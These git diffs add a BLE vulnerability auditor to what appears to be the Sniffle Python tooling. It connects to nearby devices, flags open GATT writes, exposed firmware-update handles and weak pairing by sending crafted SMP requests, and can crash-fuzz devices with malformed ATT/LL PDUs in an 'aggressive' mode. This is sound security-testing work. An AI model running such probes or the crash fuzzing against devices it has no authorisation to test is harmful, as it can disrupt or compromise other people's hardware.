+
+def check_open_control(gcli, services, read_ok: bool) -> list[Finding]:
+    """Evaluate whether GATT is accessible without pairing/encryption.
+
+    gcli     — GattClient (unused directly; reserved for future sub-checks)
+    services — list[Service] from discover_all()
+    read_ok  — True  if at least one char value was read without auth error
+                False if every read attempt was refused (auth/enc required)
+    """
+    findings: list[Finding] = []
+
+    if read_ok:
+        findings.append(Finding(
+            severity=HIGH,
+            check="no-encryption",
+            title="GATT readable without pairing/encryption",
+            detail="Connected and read attribute values with no pairing — "
+                   "traffic is plaintext and eavesdroppable.",
+        ))
+
+        # Collect characteristics with write permission bits set
+        writables = [
+            c
+            for s in services
+            for c in s.characteristics
+            if c.properties & (0x08 | 0x04)  # Write | Write-No-Response
+        ]
+        if writables:
+            handles_str = ", ".join("0x%04X" % c.value_handle for c in writables)
+            findings.append(Finding(
+                severity=HIGH,
+                check="open-control",
+                title="Writable characteristics with no auth",
+                detail="Handles %s are writable without encryption — "
+                       "the device can be controlled by anyone." % handles_str,
+            ))
+    else:
+        # Reads were refused with an auth/enc error → device is protected
+        findings.append(Finding(
+            severity=INFO,
+            check="encrypted",
+            title="Requires encryption for GATT access",
+            detail="",
+        ))
+
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# Check D — sensitive / firmware-update characteristics
+# ---------------------------------------------------------------------------
+
+def check_sensitive_chars(services, device_name: str = "") -> list[Finding]:
+    """Flag writable characteristics that expose firmware-update (DFU/OTA) paths.
+
+    Flags a HIGH finding when:
+    • A writable characteristic has a UUID in DFU_UUIDS (e.g. 0xFE59); OR
+    • The device name contains a DFU hint word AND has any writable characteristic.
+
+    Only writable characteristics are flagged — read-only DFU status handles
+    are not actionable by an attacker.
+    """
+    findings: list[Finding] = []
+    name_lower = device_name.lower() if device_name else ""
+    name_hints_dfu = any(hint in name_lower for hint in DFU_NAME_HINTS)
+
+    for svc in services:
+        for char in svc.characteristics:
+            is_writable = bool(char.properties & (0x08 | 0x04))
+            if not is_writable:
+                continue
+
+            # Direct UUID match
+            if char.uuid in DFU_UUIDS:
+                label = DFU_UUIDS[char.uuid]
+                findings.append(Finding(
+                    severity=HIGH,
+                    check="dfu-writable",
+                    title="Firmware-update characteristic exposed",
+                    detail="Writable characteristic 0x%04X (%s) allows unauthenticated "
+                           "firmware update." % (char.value_handle, label),
+                ))
+                continue
+
+            # Device name hints at DFU/OTA AND has writable characteristics
+            if name_hints_dfu:
+                findings.append(Finding(
+                    severity=HIGH,
+                    check="dfu-writable",
+                    title="Firmware-update characteristic exposed",
+                    detail="Device name suggests DFU/OTA capability and exposes writable "
+                           "characteristic at 0x%04X without authentication." % char.value_handle,
+                ))
+
+    # Deduplicate: if name_hints fired on multiple chars, keep one per value_handle
+    # (the loop above naturally produces at most one Finding per char, so no extra dedup needed)
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# SMP constants for check B (pairing downgrade)
+# ---------------------------------------------------------------------------
+
+SMP_PAIRING_REQ    = 0x01
+SMP_PAIRING_RSP    = 0x02
+SMP_PAIRING_FAILED = 0x05
+AUTHREQ_MITM       = 0x04
+AUTHREQ_SC         = 0x08
+
+
+def build_pairing_request(authreq=0x09):
+    # code, IO cap (0x03 NoInputNoOutput), OOB (0x00), AuthReq, MaxKeySize (0x10),
+    # Initiator Key Distribution (0x00), Responder Key Distribution (0x00)
+    return bytes([SMP_PAIRING_REQ, 0x03, 0x00, authreq, 0x10, 0x00, 0x00])
+
+
+def check_pairing(link) -> list:
+    """Send a Pairing Request and classify the peripheral's response."""
+    try:
+        rsp = link.smp_request(build_pairing_request())
+    except Exception:
+        return []
+    if not rsp:
+        return []   # no SMP reply — inconclusive
+    code = rsp[0]
+    if code == SMP_PAIRING_FAILED:
+        return [Finding(INFO, "pairing-rejected", "Peripheral rejected pairing",
+                        "SMP Pairing Failed (reason 0x%02X)" % (rsp[1] if len(rsp) > 1 else 0))]
+    if code == SMP_PAIRING_RSP and len(rsp) >= 4:
+        authreq = rsp[3]
+        out = []
+        if not (authreq & AUTHREQ_SC):
+            out.append(Finding(HIGH, "legacy-pairing",
+                               "LE Legacy pairing (crackable)",
+                               "No LE Secure Connections — the long-term key can be recovered "
+                               "(e.g. crackle) and traffic decrypted."))
+        if not (authreq & AUTHREQ_MITM):
+            out.append(Finding(MEDIUM, "just-works",
+                               "Just Works pairing (no MITM protection)",
+                               "No authentication — an active attacker can MITM/eavesdrop the pairing."))
+        if not out:
+            out.append(Finding(INFO, "pairing-ok", "LE Secure Connections with MITM", ""))
+        return out
+    return []
+
+
+# ---------------------------------------------------------------------------
+# Check E — crash / DoS via malformed PDUs (aggressive only)
+# ---------------------------------------------------------------------------
+
+def check_crash(link, gcli) -> list:
+    """Send malformed ATT/LL PDUs and report if the device crashes/drops the link.
+    DESTRUCTIVE — only called when aggressive=True."""
+    from . import fuzzer
+    log = fuzzer.FuzzLogger(None)
+    is_alive = lambda: link.alive
+    try:
+        fuzzer.fuzz_att_opcodes(link, log, is_alive)
+        if link.alive:
+            fuzzer.fuzz_ll_control(link, log, is_alive)
+    except Exception:
+        pass
+    if not link.alive:
+        return [Finding(HIGH, "crash",
+                        "Device crashed on malformed input",
+                        "The link dropped while sending malformed ATT/LL PDUs "
+                        "(possible DoS / SweynTooth-class memory-safety bug).")]
+    return []
+
+
+# ---------------------------------------------------------------------------
+# High-level orchestrator
+# ---------------------------------------------------------------------------
+
+class _AuditTimeout(Exception):
+    """Raised by the per-device watchdog to abandon a hung device."""
+
+
+def _recover_link(hw):
+    """Clear a wedged/desynced serial link so it can't poison the next attempt:
+    reset the firmware, flush both serial buffers, and reopen the port — the
+    reopen clears a USB-CDC-level desync (the 'readiness but no data' state) that
+    a flush alone does not."""
+    try:
+        hw.cmd_reset()
+    except Exception:
+        pass
+    try:
+        hw.ser.reset_input_buffer()
+        hw.ser.reset_output_buffer()
+    except Exception:
+        pass
+    try:
+        hw.ser.close()
+        time.sleep(0.2)
+        hw.ser.open()
+    except Exception:
+        pass
+    time.sleep(0.3)
+
+
+def audit_device(hw, device: Device, aggressive: bool = False,
+                 hard_timeout: int = 15, attempts: int = 2) -> list[Finding]:
+    """Connect to *device*, run the vulnerability checks, return sorted findings.
+
+    Hardened for bulk auditing:
+      * a hard SIGALRM watchdog (hard_timeout) abandons a hung device so it
+        cannot stall the whole sweep;
+      * a failed connect is retried up to *attempts* times after fully recovering
+        the serial link (reset + flush + reopen) — so a known-vulnerable device
+        is never missed just because an earlier flaky device desynced the link.
+    The watchdog needs the main thread (SIGALRM); off-thread it is skipped.
+    """
+    findings: list[Finding] = []
+    findings.extend(check_trackability(device))   # check C — no connection needed
+
+    # Non-connectable advertisers (beacons: ADV_NONCONN_IND / ADV_SCAN_IND) never
+    # answer a CONNECT_IND, so every connect attempt just burns the watchdog and
+    # reports a misleading "could not connect". Skip the connection-based checks
+    # entirely and say so plainly. Passive checks (trackability) have already run.
+    if not getattr(device, "connectable", True):
+        findings.append(Finding(INFO, "non-connectable",
+            "Non-connectable advertiser — GATT not assessable",
+            "Device advertises but does not accept connections (beacon); "
+            "only passive checks apply."))
+        return sorted(findings, key=lambda f: _SEV_ORDER[f.severity])
+
+    use_alarm = threading.current_thread() is threading.main_thread()
+    old_handler = None
+    if use_alarm:
+        def _on_alarm(signum, frame):
+            raise _AuditTimeout()
+        old_handler = signal.signal(signal.SIGALRM, _on_alarm)
+
+    conn_findings = None
+    last_err = "no connection established"
+
+    for attempt in range(attempts):
+        link = None
+        if use_alarm:
+            signal.alarm(int(hard_timeout))
+        try:
+            link = connect_session(
+                hw, mac_to_list(device.mac),
+                is_random=(device.addr_type != "Public"),
+                posture=Posture(), timeout=5)
+            gcli = GattClient(link)
+            services = gcli.discover_all(read_values=True)
+
+            read_ok = any(c.value is not None
+                          for s in services for c in s.characteristics)
+            if not read_ok:
+                readable = next((c for s in services for c in s.characteristics
+                                 if c.properties & 0x02), None)
+                if readable is not None:
+                    try:
+                        gcli.read(readable.value_handle)
+                        read_ok = True
+                    except ATTError as e:
+                        if e.code in (0x05, 0x0F):
+                            read_ok = False  # confirmed auth/enc required
+                    except Exception:
+                        pass
+
+            chk: list[Finding] = []
+            chk.extend(check_open_control(gcli, services, read_ok))            # A
+            chk.extend(check_sensitive_chars(services, device_name=device.name))  # D
+            chk.extend(check_pairing(link))                                    # B
+            if aggressive:
+                chk.extend(check_crash(link, gcli))                            # E
+            conn_findings = chk
+            break  # success — no retry needed
+        except _AuditTimeout:
+            conn_findings = [Finding(INFO, "timeout",
+                "Audit timed out after %ds (device hung the connection)" % hard_timeout, "")]
+            break  # a hang will not resolve on retry
+        except Exception as e:
+            last_err = str(e)   # transient/connect failure — recover and retry
+        finally:
+            if use_alarm:
+                signal.alarm(0)
+            if link is not None:
+                try:
+                    link.close()
+                except Exception:
+                    pass
+            _recover_link(hw)
+
+    if use_alarm and old_handler is not None:
+        signal.signal(signal.SIGALRM, old_handler)
+
+    if conn_findings is None:
+        conn_findings = [Finding(INFO, "unreachable",
+            "Could not connect after %d attempts (not assessable)" % attempts, last_err)]
+    findings.extend(conn_findings)
+    return sorted(findings, key=lambda f: _SEV_ORDER[f.severity])
+
+
+# ---------------------------------------------------------------------------
+# Rendering helpers
+# ---------------------------------------------------------------------------
+
+# ANSI colour codes
+_RESET  = "\033[0m"
+_RED    = "\033[1;31m"
+_YELLOW = "\033[1;33m"
+_DIM    = "\033[2m"
+
+_SEV_COLOR = {
+    HIGH:   _RED,
+    MEDIUM: _YELLOW,
+    LOW:    _DIM,
+    INFO:   "",
+}
+
+
+def _color(text: str, code: str, enabled: bool) -> str:
+    if not enabled or not code:
+        return text
+    return code + text + _RESET
+
+
+def render_audit(device: Device, findings: list[Finding], color: bool = True) -> str:
+    """Return a per-device audit block as a string."""
+    lines: list[str] = []
+
+    # Header
+    header = "%s  %s  (%s)" % (device.mac, device.name or "(unknown)", device.addr_type)
+    lines.append(_color(header, "\033[1m", color))
+
+    if not findings:
+        lines.append("  (no findings)")
+    else:
+        for f in findings:
+            code = _SEV_COLOR.get(f.severity, "")
+            sev_str = _color("[%s]" % f.severity, code, color)
+            lines.append("  %s %s" % (sev_str, f.title))
+            if f.detail:
+                lines.append("    %s" % f.detail)
+
+    # Verdict
+    sevs = {f.severity for f in findings}
+    if HIGH in sevs:
+        verdict = _color("→ VULNERABLE", _RED, color)
+    elif MEDIUM in sevs:
+        verdict = _color("→ WEAK", _YELLOW, color)
+    elif sevs - {INFO}:  # LOW present
+        verdict = _color("→ minor/limited", _DIM, color)
+    elif sevs:  # INFO only
+        verdict = "→ no significant findings"
+    else:
+        verdict = "→ no findings"
+
+    lines.append(verdict)
+    return "\n".join(lines)
+
+
+def render_audit_summary(results: list, color: bool = True) -> str:
+    """Return a compact summary table for all audited devices.
+
+    results: list of (Device, list[Finding])
+    Sorted by highest severity then RSSI descending.
+    """
+
+    def _highest_sev(findings):
+        if not findings:
+            return INFO
+        return min(findings, key=lambda f: _SEV_ORDER[f.severity]).severity
+
+    def _sort_key(item):
+        device, findings = item
+        return (_SEV_ORDER[_highest_sev(findings)], -device.rssi)
+
+    sorted_results = sorted(results, key=_sort_key)
+
+    col_mac   = 17
+    col_name  = 20
+    col_sev   = 8
+    col_hi    = 5
+    col_verd  = 14
+    sep = "  "
+
+    header = (
+        "MAC".ljust(col_mac) + sep +
+        "Name".ljust(col_name) + sep +
+        "HighSev".ljust(col_sev) + sep +
+        "#HIGH".rjust(col_hi) + sep +
+        "Verdict"
+    )
+    divider = "-" * (col_mac + col_name + col_sev + col_hi + col_verd + 4 * len(sep))
+    lines = ["\n" + "=" * len(divider), "Audit Summary", divider, header, divider]
+
+    for device, findings in sorted_results:
+        hs = _highest_sev(findings)
+        n_high = sum(1 for f in findings if f.severity == HIGH)
+        sevs = {f.severity for f in findings}
+
+        if HIGH in sevs:
+            verdict_str = "VULNERABLE"
+            code = _SEV_COLOR[HIGH]
+        elif MEDIUM in sevs:
+            verdict_str = "WEAK"
+            code = _SEV_COLOR[MEDIUM]
+        elif LOW in sevs:
+            verdict_str = "minor/limited"
+            code = _SEV_COLOR[LOW]
+        else:
+            verdict_str = "no findings"
+            code = ""
+
+        name_trunc = (device.name[:18] + "..") if len(device.name) > 20 else (device.name or "")
+        row = (
+            device.mac.ljust(col_mac) + sep +
+            name_trunc.ljust(col_name) + sep +
+            _color(hs.ljust(col_sev), _SEV_COLOR.get(hs, ""), color) + sep +
+            str(n_high).rjust(col_hi) + sep +
+            _color(verdict_str, code, color)
+        )
+        lines.append(row)
+
+    lines.append(divider)
+    return "\n".join(lines)

--- a/python_cli/sniffle/audit.py
+++ b/python_cli/sniffle/audit.py
@@ -281,7 +281,8 @@ def _recover_link(hw):
 
 
 def audit_device(hw, device: Device, aggressive: bool = False,
-                 hard_timeout: int = 15, attempts: int = 2) -> list[Finding]:
+                 hard_timeout: int = 15, attempts: int = 2,
+                 try_both_addr_types: bool = False) -> list[Finding]:
     """Connect to *device*, run the vulnerability checks, return sorted findings.
 
     Hardened for bulk auditing:
@@ -291,6 +292,12 @@ def audit_device(hw, device: Device, aggressive: bool = False,
         the serial link (reset + flush + reopen) — so a known-vulnerable device
         is never missed just because an earlier flaky device desynced the link.
     The watchdog needs the main thread (SIGALRM); off-thread it is skipped.
+
+    Connection budget matches the interactive `connect` path (bluecat.py's
+    _connect_or_die): an 8s per-attempt window (a flaky/slow peripheral often
+    needs more than 5s to answer a CONNECT_IND). With try_both_addr_types the
+    final attempt flips the address type, so a single-target audit whose
+    Public/Random guess was wrong still connects.
     """
     findings: list[Finding] = []
     findings.extend(check_trackability(device))   # check C — no connection needed
@@ -316,15 +323,24 @@ def audit_device(hw, device: Device, aggressive: bool = False,
     conn_findings = None
     last_err = "no connection established"
 
+    primary_random = (device.addr_type != "Public")
+
     for attempt in range(attempts):
         link = None
+        # Use the advertised/guessed address type on all but the last attempt;
+        # on the final attempt fall back to the other type (only when asked, so
+        # bulk sweeps with a known-correct type don't burn a wrong-type attempt).
+        if try_both_addr_types and attempt == attempts - 1:
+            is_random = not primary_random
+        else:
+            is_random = primary_random
         if use_alarm:
             signal.alarm(int(hard_timeout))
         try:
             link = connect_session(
                 hw, mac_to_list(device.mac),
-                is_random=(device.addr_type != "Public"),
-                posture=Posture(), timeout=5)
+                is_random=is_random,
+                posture=Posture(), timeout=8)
             gcli = GattClient(link)
             services = gcli.discover_all(read_values=True)
 

--- a/python_cli/sniffle/audit.py
+++ b/python_cli/sniffle/audit.py
@@ -1,12 +1,12 @@
 """
-audit.py — BLE vulnerability auditor framework (pass 1 of 2).
+audit.py - BLE vulnerability auditor framework (pass 1 of 2).
 
 Checks implemented (non-destructive, hardware-free testable):
-  A  check_open_control   — GATT readable/writable with no auth/encryption
-  C  check_trackability   — persistent address (Public / Static RPA)
-  D  check_sensitive_chars — firmware-update / OTA characteristics exposed
+  A  check_open_control   - GATT readable/writable with no auth/encryption
+  C  check_trackability   - persistent address (Public / Static RPA)
+  D  check_sensitive_chars - firmware-update / OTA characteristics exposed
 
-Checks B (pairing downgrade) and E (crash/DoS) are pass 2 — extension
+Checks B (pairing downgrade) and E (crash/DoS) are pass 2 - extension
 points are marked with # PASS2 comments below.
 """
 
@@ -55,13 +55,13 @@ DFU_NAME_HINTS = ("dfu", "ota", "firmware", "upgrade")
 
 
 # ---------------------------------------------------------------------------
-# Check C — address trackability
+# Check C - address trackability
 # ---------------------------------------------------------------------------
 
 def check_trackability(device: Device) -> list[Finding]:
     """Return a LOW finding if the device uses a persistent (trackable) address.
 
-    Public and Static Random addresses never rotate → long-term tracking is
+    Public and Static Random addresses never rotate -> long-term tracking is
     possible.  RPA (Resolvable Private) and NRPA (Non-resolvable Private)
     rotate and are therefore not flagged.
     """
@@ -71,21 +71,21 @@ def check_trackability(device: Device) -> list[Finding]:
             severity=LOW,
             check="trackable",
             title="Persistently trackable address (%s)" % addr_type,
-            detail="No RPA rotation — the device can be tracked across time/locations.",
+            detail="No RPA rotation - the device can be tracked across time/locations.",
         )]
     return []
 
 
 # ---------------------------------------------------------------------------
-# Check A — open GATT control (no auth / encryption)
+# Check A - open GATT control (no auth / encryption)
 # ---------------------------------------------------------------------------
 
 def check_open_control(gcli, services, read_ok: bool) -> list[Finding]:
     """Evaluate whether GATT is accessible without pairing/encryption.
 
-    gcli     — GattClient (unused directly; reserved for future sub-checks)
-    services — list[Service] from discover_all()
-    read_ok  — True  if at least one char value was read without auth error
+    gcli     - GattClient (unused directly; reserved for future sub-checks)
+    services - list[Service] from discover_all()
+    read_ok  - True  if at least one char value was read without auth error
                 False if every read attempt was refused (auth/enc required)
     """
     findings: list[Finding] = []
@@ -95,7 +95,7 @@ def check_open_control(gcli, services, read_ok: bool) -> list[Finding]:
             severity=HIGH,
             check="no-encryption",
             title="GATT readable without pairing/encryption",
-            detail="Connected and read attribute values with no pairing — "
+            detail="Connected and read attribute values with no pairing - "
                    "traffic is plaintext and eavesdroppable.",
         ))
 
@@ -112,11 +112,11 @@ def check_open_control(gcli, services, read_ok: bool) -> list[Finding]:
                 severity=HIGH,
                 check="open-control",
                 title="Writable characteristics with no auth",
-                detail="Handles %s are writable without encryption — "
+                detail="Handles %s are writable without encryption - "
                        "the device can be controlled by anyone." % handles_str,
             ))
     else:
-        # Reads were refused with an auth/enc error → device is protected
+        # Reads were refused with an auth/enc error -> device is protected
         findings.append(Finding(
             severity=INFO,
             check="encrypted",
@@ -128,17 +128,17 @@ def check_open_control(gcli, services, read_ok: bool) -> list[Finding]:
 
 
 # ---------------------------------------------------------------------------
-# Check D — sensitive / firmware-update characteristics
+# Check D - sensitive / firmware-update characteristics
 # ---------------------------------------------------------------------------
 
 def check_sensitive_chars(services, device_name: str = "") -> list[Finding]:
     """Flag writable characteristics that expose firmware-update (DFU/OTA) paths.
 
     Flags a HIGH finding when:
-    • A writable characteristic has a UUID in DFU_UUIDS (e.g. 0xFE59); OR
-    • The device name contains a DFU hint word AND has any writable characteristic.
+    * A writable characteristic has a UUID in DFU_UUIDS (e.g. 0xFE59); OR
+    * The device name contains a DFU hint word AND has any writable characteristic.
 
-    Only writable characteristics are flagged — read-only DFU status handles
+    Only writable characteristics are flagged - read-only DFU status handles
     are not actionable by an attacker.
     """
     findings: list[Finding] = []
@@ -202,7 +202,7 @@ def check_pairing(link) -> list:
     except Exception:
         return []
     if not rsp:
-        return []   # no SMP reply — inconclusive
+        return []   # no SMP reply - inconclusive
     code = rsp[0]
     if code == SMP_PAIRING_FAILED:
         return [Finding(INFO, "pairing-rejected", "Peripheral rejected pairing",
@@ -213,12 +213,12 @@ def check_pairing(link) -> list:
         if not (authreq & AUTHREQ_SC):
             out.append(Finding(HIGH, "legacy-pairing",
                                "LE Legacy pairing (crackable)",
-                               "No LE Secure Connections — the long-term key can be recovered "
+                               "No LE Secure Connections - the long-term key can be recovered "
                                "(e.g. crackle) and traffic decrypted."))
         if not (authreq & AUTHREQ_MITM):
             out.append(Finding(MEDIUM, "just-works",
                                "Just Works pairing (no MITM protection)",
-                               "No authentication — an active attacker can MITM/eavesdrop the pairing."))
+                               "No authentication - an active attacker can MITM/eavesdrop the pairing."))
         if not out:
             out.append(Finding(INFO, "pairing-ok", "LE Secure Connections with MITM", ""))
         return out
@@ -226,12 +226,12 @@ def check_pairing(link) -> list:
 
 
 # ---------------------------------------------------------------------------
-# Check E — crash / DoS via malformed PDUs (aggressive only)
+# Check E - crash / DoS via malformed PDUs (aggressive only)
 # ---------------------------------------------------------------------------
 
 def check_crash(link, gcli) -> list:
     """Send malformed ATT/LL PDUs and report if the device crashes/drops the link.
-    DESTRUCTIVE — only called when aggressive=True."""
+    DESTRUCTIVE - only called when aggressive=True."""
     from . import fuzzer
     log = fuzzer.FuzzLogger(None)
     is_alive = lambda: link.alive
@@ -259,7 +259,7 @@ class _AuditTimeout(Exception):
 
 def _recover_link(hw):
     """Clear a wedged/desynced serial link so it can't poison the next attempt:
-    reset the firmware, flush both serial buffers, and reopen the port — the
+    reset the firmware, flush both serial buffers, and reopen the port - the
     reopen clears a USB-CDC-level desync (the 'readiness but no data' state) that
     a flush alone does not."""
     try:
@@ -289,7 +289,7 @@ def audit_device(hw, device: Device, aggressive: bool = False,
       * a hard SIGALRM watchdog (hard_timeout) abandons a hung device so it
         cannot stall the whole sweep;
       * a failed connect is retried up to *attempts* times after fully recovering
-        the serial link (reset + flush + reopen) — so a known-vulnerable device
+        the serial link (reset + flush + reopen) - so a known-vulnerable device
         is never missed just because an earlier flaky device desynced the link.
     The watchdog needs the main thread (SIGALRM); off-thread it is skipped.
 
@@ -300,7 +300,7 @@ def audit_device(hw, device: Device, aggressive: bool = False,
     Public/Random guess was wrong still connects.
     """
     findings: list[Finding] = []
-    findings.extend(check_trackability(device))   # check C — no connection needed
+    findings.extend(check_trackability(device))   # check C - no connection needed
 
     # Non-connectable advertisers (beacons: ADV_NONCONN_IND / ADV_SCAN_IND) never
     # answer a CONNECT_IND, so every connect attempt just burns the watchdog and
@@ -308,7 +308,7 @@ def audit_device(hw, device: Device, aggressive: bool = False,
     # entirely and say so plainly. Passive checks (trackability) have already run.
     if not getattr(device, "connectable", True):
         findings.append(Finding(INFO, "non-connectable",
-            "Non-connectable advertiser — GATT not assessable",
+            "Non-connectable advertiser - GATT not assessable",
             "Device advertises but does not accept connections (beacon); "
             "only passive checks apply."))
         return sorted(findings, key=lambda f: _SEV_ORDER[f.severity])
@@ -366,13 +366,13 @@ def audit_device(hw, device: Device, aggressive: bool = False,
             if aggressive:
                 chk.extend(check_crash(link, gcli))                            # E
             conn_findings = chk
-            break  # success — no retry needed
+            break  # success - no retry needed
         except _AuditTimeout:
             conn_findings = [Finding(INFO, "timeout",
                 "Audit timed out after %ds (device hung the connection)" % hard_timeout, "")]
             break  # a hang will not resolve on retry
         except Exception as e:
-            last_err = str(e)   # transient/connect failure — recover and retry
+            last_err = str(e)   # transient/connect failure - recover and retry
         finally:
             if use_alarm:
                 signal.alarm(0)
@@ -438,15 +438,15 @@ def render_audit(device: Device, findings: list[Finding], color: bool = True) ->
     # Verdict
     sevs = {f.severity for f in findings}
     if HIGH in sevs:
-        verdict = _color("→ VULNERABLE", _RED, color)
+        verdict = _color("-> VULNERABLE", _RED, color)
     elif MEDIUM in sevs:
-        verdict = _color("→ WEAK", _YELLOW, color)
+        verdict = _color("-> WEAK", _YELLOW, color)
     elif sevs - {INFO}:  # LOW present
-        verdict = _color("→ minor/limited", _DIM, color)
+        verdict = _color("-> minor/limited", _DIM, color)
     elif sevs:  # INFO only
-        verdict = "→ no significant findings"
+        verdict = "-> no significant findings"
     else:
-        verdict = "→ no findings"
+        verdict = "-> no findings"
 
     lines.append(verdict)
     return "\n".join(lines)

--- a/python_cli/sniffle/central_link.py
+++ b/python_cli/sniffle/central_link.py
@@ -144,7 +144,7 @@ class CentralLink:
             self._ver_waiting = True
             # Our own LL_VERSION_IND: VersNr=0x0C (BT 5.3), CompId=0x000D (TI, the
             # radio's vendor), SubVersNr=0. The values we send don't affect the
-            # peer's reply — we only care about the CompId it sends back.
+            # peer's reply - we only care about the CompId it sends back.
             self.tx_raw_ll(3, bytes([LL_VERSION_IND, 0x0C, 0x0D, 0x00, 0x00, 0x00]))
             try:
                 return self._ver_resp.get(timeout=timeout)
@@ -156,8 +156,8 @@ class CentralLink:
     def terminate(self, reason=0x13, wait_s=3.0, poll=0.05):
         """Drop the connection by sending LL_TERMINATE_IND (opcode 0x02 + reason)
         as the master. The firmware ends the connection once it actually
-        transmits the PDU — reactToTransmitted() -> handleConnFinished() ->
-        STATE:STATIC — which flips self.alive via the pump. Wait up to *wait_s*
+        transmits the PDU - reactToTransmitted() -> handleConnFinished() ->
+        STATE:STATIC - which flips self.alive via the pump. Wait up to *wait_s*
         for that; if the peer never acks the terminate in time, force a firmware
         reset so the next connect starts from a clean STATIC state instead of a
         stuck CENTRAL.

--- a/python_cli/sniffle/central_link.py
+++ b/python_cli/sniffle/central_link.py
@@ -1,0 +1,200 @@
+import queue, threading, struct, time
+from . import att
+from .packet_decoder import PacketMessage, DPacketMessage, DataMessage, LlControlMessage
+from .sniffer_state import StateMessage, SnifferState
+from .ll_version import parse_ll_version_ind, LL_VERSION_IND
+
+
+class LinkLost(Exception):
+    pass
+
+
+class ATTError(Exception):
+    def __init__(self, req_opcode, handle, code):
+        self.req_opcode = req_opcode
+        self.handle = handle
+        self.code = code
+        super().__init__("ATT error %s on handle 0x%04X (req 0x%02X)" % (
+            att.att_error_name(code), handle, req_opcode))
+
+
+class CentralLink:
+    def __init__(self, hw, pcap_writer=None, on_disconnect=None, on_control=None, on_smp=None):
+        self.hw = hw
+        self.pcap_writer = pcap_writer
+        self.on_disconnect = on_disconnect
+        self.on_control = on_control   # callback(opcode): LL control PDUs, for posture
+        self.on_smp = on_smp           # callback(smp_bytes): SMP pairing PDUs, for posture
+        self.alive = True
+        self.notifications = queue.Queue()
+        self._req_lock = threading.Lock()
+        self._resp = queue.Queue(maxsize=1)
+        self._waiting = False
+        self._smp_resp = queue.Queue(maxsize=1)
+        self._smp_waiting = False
+        self.peer_version = None       # LLVersion from LL_VERSION_IND, once seen
+        self._ver_resp = queue.Queue(maxsize=1)
+        self._ver_waiting = False
+        self._stop = False
+        self._thread = threading.Thread(target=self._pump, daemon=True)
+        self._thread.start()
+
+    def _pump(self):
+        while not self._stop:
+            try:
+                msg = self.hw.recv_and_decode()
+            except Exception:
+                if self._stop:
+                    return
+                continue
+            try:
+                self._route(msg)
+            except Exception:
+                continue
+
+    def _route(self, msg):
+        if isinstance(msg, StateMessage):
+            if msg.new_state != SnifferState.CENTRAL:
+                self.alive = False
+                if self.on_disconnect:
+                    self.on_disconnect(msg.new_state)
+            return
+        if not isinstance(msg, PacketMessage):
+            return
+        dpkt = DPacketMessage.decode(msg)
+        if self.pcap_writer:
+            self.pcap_writer.write_packet_message(dpkt)
+        if isinstance(dpkt, LlControlMessage):
+            if self.on_control:
+                self.on_control(dpkt.opcode)
+            if dpkt.opcode == LL_VERSION_IND:
+                v = parse_ll_version_ind(dpkt.body)
+                if v is not None:
+                    self.peer_version = v
+                    if self._ver_waiting and not self._ver_resp.full():
+                        self._ver_resp.put(v)
+        if not isinstance(dpkt, DataMessage):
+            return
+        if dpkt.data_dir != 1:           # only peripheral->central
+            return
+        att_pdu = att.extract_att(dpkt.body)
+        if att_pdu is None:
+            self._maybe_smp(dpkt.body)
+            return
+        op = att_pdu[0]
+        if op in (att.ATT_HANDLE_VALUE_NTF, att.ATT_HANDLE_VALUE_IND):
+            handle = att_pdu[1] | (att_pdu[2] << 8)
+            self.notifications.put((handle, att_pdu[3:]))
+            if op == att.ATT_HANDLE_VALUE_IND:
+                self.att_command(att.ATT_HANDLE_VALUE_CFM, b'')
+            return
+        if self._waiting and not self._resp.full():
+            self._resp.put(att_pdu)
+
+    def _maybe_smp(self, body):
+        if len(body) < 6:
+            return
+        payload = body[2:]
+        l2len, cid = struct.unpack('<HH', payload[:4])
+        if cid == att.SMP_CID:
+            smp_pdu = payload[4:4+l2len]
+            if self._smp_waiting and not self._smp_resp.full():
+                self._smp_resp.put(smp_pdu)
+            if self.on_smp:
+                self.on_smp(smp_pdu)
+
+    def att_request(self, pdu, timeout=2.0):
+        if not self.alive:
+            raise LinkLost()
+        with self._req_lock:
+            while not self._resp.empty():
+                self._resp.get_nowait()
+            self._waiting = True
+            self.hw.cmd_transmit(2, att.l2cap_wrap(pdu))
+            try:
+                rsp = self._resp.get(timeout=timeout)
+            except queue.Empty:
+                raise LinkLost() if not self.alive else TimeoutError("ATT request timed out")
+            finally:
+                self._waiting = False
+        if rsp and rsp[0] == att.ATT_ERROR_RSP:
+            req, handle, code = att.parse_error_rsp(rsp)
+            raise ATTError(req, handle, code)
+        return rsp
+
+    def att_command(self, opcode, payload):
+        self.hw.cmd_transmit(2, att.l2cap_wrap(bytes([opcode]) + bytes(payload)))
+
+    def tx_raw_ll(self, llid, pdu):
+        self.hw.cmd_transmit(llid, bytes(pdu))
+
+    def request_version(self, timeout=3.0):
+        """Send LL_VERSION_IND and return the peer's LLVersion (controller's SIG
+        Company Identifier + Bluetooth version), or None on timeout. Sniffle's
+        firmware doesn't auto-exchange version, so the central must send first;
+        the peripheral replies with its own LL_VERSION_IND exactly once. If a
+        version was already captured passively, it's returned immediately."""
+        if not self.alive:
+            raise LinkLost()
+        if self.peer_version is not None:
+            return self.peer_version
+        with self._req_lock:
+            while not self._ver_resp.empty():
+                self._ver_resp.get_nowait()
+            self._ver_waiting = True
+            # Our own LL_VERSION_IND: VersNr=0x0C (BT 5.3), CompId=0x000D (TI, the
+            # radio's vendor), SubVersNr=0. The values we send don't affect the
+            # peer's reply — we only care about the CompId it sends back.
+            self.tx_raw_ll(3, bytes([LL_VERSION_IND, 0x0C, 0x0D, 0x00, 0x00, 0x00]))
+            try:
+                return self._ver_resp.get(timeout=timeout)
+            except queue.Empty:
+                return self.peer_version
+            finally:
+                self._ver_waiting = False
+
+    def terminate(self, reason=0x13, wait_s=3.0, poll=0.05):
+        """Drop the connection by sending LL_TERMINATE_IND (opcode 0x02 + reason)
+        as the master. The firmware ends the connection once it actually
+        transmits the PDU — reactToTransmitted() -> handleConnFinished() ->
+        STATE:STATIC — which flips self.alive via the pump. Wait up to *wait_s*
+        for that; if the peer never acks the terminate in time, force a firmware
+        reset so the next connect starts from a clean STATIC state instead of a
+        stuck CENTRAL.
+
+        Returns True if the firmware closed the link on its own, False if we had
+        to force a reset."""
+        self.tx_raw_ll(3, bytes([0x02, reason & 0xFF]))
+        deadline = time.monotonic() + wait_s
+        while self.alive and time.monotonic() < deadline:
+            time.sleep(poll)
+        if self.alive:
+            try:
+                self.hw.cmd_reset()
+            except Exception:
+                pass
+            self.alive = False
+            return False
